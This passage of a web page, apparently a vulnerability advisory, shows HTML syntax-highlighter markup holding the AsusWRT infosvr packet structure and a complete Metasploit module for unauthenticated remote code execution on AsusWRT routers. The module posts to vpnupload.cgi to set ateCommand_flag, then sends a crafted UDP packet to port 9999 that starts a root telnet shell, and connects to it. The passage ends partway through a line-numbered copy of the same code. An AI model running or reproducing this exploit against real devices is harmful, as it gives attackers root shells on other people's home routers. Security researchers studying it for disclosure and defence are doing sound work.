class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295040817832852-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295040817832852-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295040817832852-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295040817832852-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295040817832852-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295040817832852-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295040817832852-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295040817832852-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295040817832852-18\">18<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a66636295040817832852-1\"><span class=\"crayon-e\">Packet <\/span><span class=\"crayon-e\">structure<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">AsusWRT_source<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">router<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">shared<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">iboxcom<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">h<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295040817832852-2\"><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Header<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295040817832852-3\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-r\">typedef<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">iboxPKTEx<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295040817832852-4\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295040817832852-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">BYTE<\/span><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">ServiceID<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295040817832852-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">BYTE<\/span><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">PacketType<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295040817832852-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">WORD<\/span><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">OpCode<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295040817832852-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">DWORD \t\t<\/span><span class=\"crayon-v\">Info<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ Or Transaction ID<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295040817832852-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">BYTE<\/span><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">MacAddress<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295040817832852-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">BYTE<\/span><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">Password<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">32<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/\/NULL terminated string, string length:1~31, cannot be NULL string<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295040817832852-11\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ibox_comm_pkt_hdr_ex<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295040817832852-12\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295040817832852-13\"><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Body<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295040817832852-14\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-r\">typedef<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">iboxPKTCmd<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295040817832852-15\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295040817832852-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">WORD<\/span><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295040817832852-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">BYTE<\/span><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">420<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295040817832852-18\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PKT_SYSCMD<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-c\">\/\/ total 422 bytes<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0015 seconds] -->  <\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a66636295042778926259\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> require &#8216;msf\/core&#8217;    class MetasploitModule &lt; Msf::Exploit::Remote    Rank = ExcellentRanking      include Msf::Exploit::Remote::HttpClient    include Msf::Exploit::Remote::Udp      def initialize(info = {})      super(update_info(info,        &#8216;Name&#8217;           =&gt; &#8216;AsusWRT LAN Unauthenticated Remote Code Execution&#8217;,        &#8216;Description&#8217;    =&gt; %q{        The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to        perform a POST in certain cases. This can be combined with another vulnerability in        the VPN configuration upload routine that sets NVRAM configuration variables directly        from the POST request to enable a special command mode.        This command mode can then be abused by sending a UDP packet to infosvr, which is running        on port UDP 9999 to directly execute commands as root.        This exploit leverages that to start telnetd in a random port, and then connects to it.        It has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743.        },        &#8216;Author&#8217;         =&gt;          [            &#8216;Beyond Security&#8217;         # Vulnerability discovery and Metasploit module          ],        &#8216;License&#8217;        =&gt; MSF_LICENSE,        &#8216;References&#8217;     =&gt;          [            [&#8216;CVE&#8217;, &#8216;add later&#8217;],            [&#8216;Add&#8217;, &#8216;links&#8217;]                    ],        &#8216;Targets&#8217;        =&gt;          [            [ &#8216;AsusWRT &lt; (add fixed version later)&#8217;,              {                &#8216;Payload&#8217;        =&gt;                  {                    &#8216;Compat&#8217;  =&gt; {                      &#8216;PayloadType&#8217;    =&gt; &#8216;cmd_interact&#8217;,                      &#8216;ConnectionType&#8217; =&gt; &#8216;find&#8217;,                    },                  },              }            ],          ],        &#8216;Privileged&#8217;     =&gt; true,        &#8216;Platform&#8217;       =&gt; &#8216;unix&#8217;,        &#8216;Arch&#8217;           =&gt; ARCH_CMD,        &#8216;DefaultOptions&#8217; =&gt; { &#8216;PAYLOAD&#8217; =&gt; &#8216;cmd\/unix\/interact&#8217; },        &#8216;DisclosureDate&#8217;  =&gt; &#8221;,        &#8216;DefaultTarget&#8217;   =&gt; 0))      register_options(        [          Opt::RPORT(9999)        ])              register_advanced_options(        [          OptInt.new(&#8216;ASUSWRTPORT&#8217;, [true,  &#8216;AsusWRT HTTP portal port&#8217;, 80])        ])    end      def exploit      # first we set the ateCommand_flag variable to 1 to allow PKT_SYSCMD       # this attack can also be used to overwrite the web interface password and achieve RCE by enabling SSH and rebooting!      post_data = Rex::MIME::Message.new      post_data.add_part(&#8216;1&#8217;, content_type = nil, transfer_encoding = nil, content_disposition = &#8220;form-data; name=&#8221;ateCommand_flag&#8221;&#8221;)        data = post_data.to_s        res = send_request_cgi({        &#8216;uri&#8217;    =&gt; &#8220;\/vpnupload.cgi&#8221;,        &#8216;method&#8217; =&gt; &#8216;POST&#8217;,        &#8216;rport&#8217;  =&gt; datastore[&#8216;ASUSWRTPORT&#8217;],        &#8216;data&#8217;   =&gt; data,        &#8216;ctype&#8217;  =&gt; &#8220;multipart\/form-data; boundary=#{post_data.bound}&#8221;      })        if res and res.code == 200        print_good(&#8220;#{peer} &#8211; Successfully set the ateCommand_flag variable.&#8221;)      else        fail_with(Failure::Unknown, &#8220;#{peer} &#8211; Failed to set ateCommand_flag variable.&#8221;)      end                  # &#8230; but we like to do it more cleanly, so let&#8217;s send the PKT_SYSCMD as described in the comments above.        info_pdu_size = 512                         # expected packet size, not sure what the extra bytes are      r = Random.new        ibox_comm_pkt_hdr_ex  =          [0x0c].pack(&#8216;C*&#8217;) +                     # NET_SERVICE_ID_IBOX_INFO\t0xC          [0x15].pack(&#8216;C*&#8217;) +                     # NET_PACKET_TYPE_CMD 0x15          [0x33,0x00].pack(&#8216;C*&#8217;) +                # NET_CMD_ID_MANU_CMD 0x33          r.bytes(4) +                            # Info, don&#8217;t know what this is          r.bytes(6) +                            # MAC address          r.bytes(32)                             # Password        telnet_port = rand((2**16)-1024)+1024      cmd = &#8220;\/usr\/sbin\/telnetd -l \/bin\/sh -p #{telnet_port}&#8221; + [0x00].pack(&#8216;C*&#8217;)      pkt_syscmd =          [cmd.length,0x00].pack(&#8216;C*&#8217;) +          # cmd length          cmd                                     # our command        pkt_final = ibox_comm_pkt_hdr_ex + pkt_syscmd + r.bytes(info_pdu_size &#8211; (ibox_comm_pkt_hdr_ex + pkt_syscmd).length)            connect_udp      udp_sock.put(pkt_final)                     # we could process the response, but we don&#8217;t care      disconnect_udp                                                            print_status(&#8220;#{peer} &#8211; Packet sent, let&#8217;s sleep 10 seconds and try to connect to the router on port #{telnet_port}&#8221;)      sleep(10)            begin        ctx = { &#8216;Msf&#8217; =&gt; framework, &#8216;MsfExploit&#8217; =&gt; self }        sock = Rex::Socket.create_tcp({ &#8216;PeerHost&#8217; =&gt; rhost, &#8216;PeerPort&#8217; =&gt; telnet_port, &#8216;Context&#8217; =&gt; ctx, &#8216;Timeout&#8217; =&gt; 10 })        if not sock.nil?          print_good(&#8220;#{peer} &#8211; Success, shell incoming!&#8221;)          return handler(sock)        end      rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError =&gt; e        sock.close if sock      end        print_bad(&#8220;#{peer} &#8211; Well that didn&#8217;t work&#8230; try again?&#8221;)    end  end<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-96\">96<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-97\">97<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-98\">98<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-99\">99<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-100\">100<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-101\">101<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-102\">102<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-103\">103<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-104\">104<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-105\">105<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-106\">106<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-107\">107<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-108\">108<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-109\">109<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-110\">110<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-111\">111<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-112\">112<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-113\">113<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-114\">114<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-115\">115<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-116\">116<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-117\">117<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-118\">118<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-119\">119<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-120\">120<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-121\">121<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-122\">122<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-123\">123<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-124\">124<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295042778926259-125\">125<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295042778926259-126\">126<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-1\"><span class=\"crayon-i\">require<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;msf\/core&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-3\"><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MetasploitModule<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Msf<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Exploit<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">Remote<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-4\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">Rank<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ExcellentRanking<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-6\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">include <\/span><span class=\"crayon-v\">Msf<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Exploit<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Remote<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">HttpClient<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-7\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">include <\/span><span class=\"crayon-v\">Msf<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Exploit<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Remote<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">Udp<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-9\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">initialize<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">info<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span 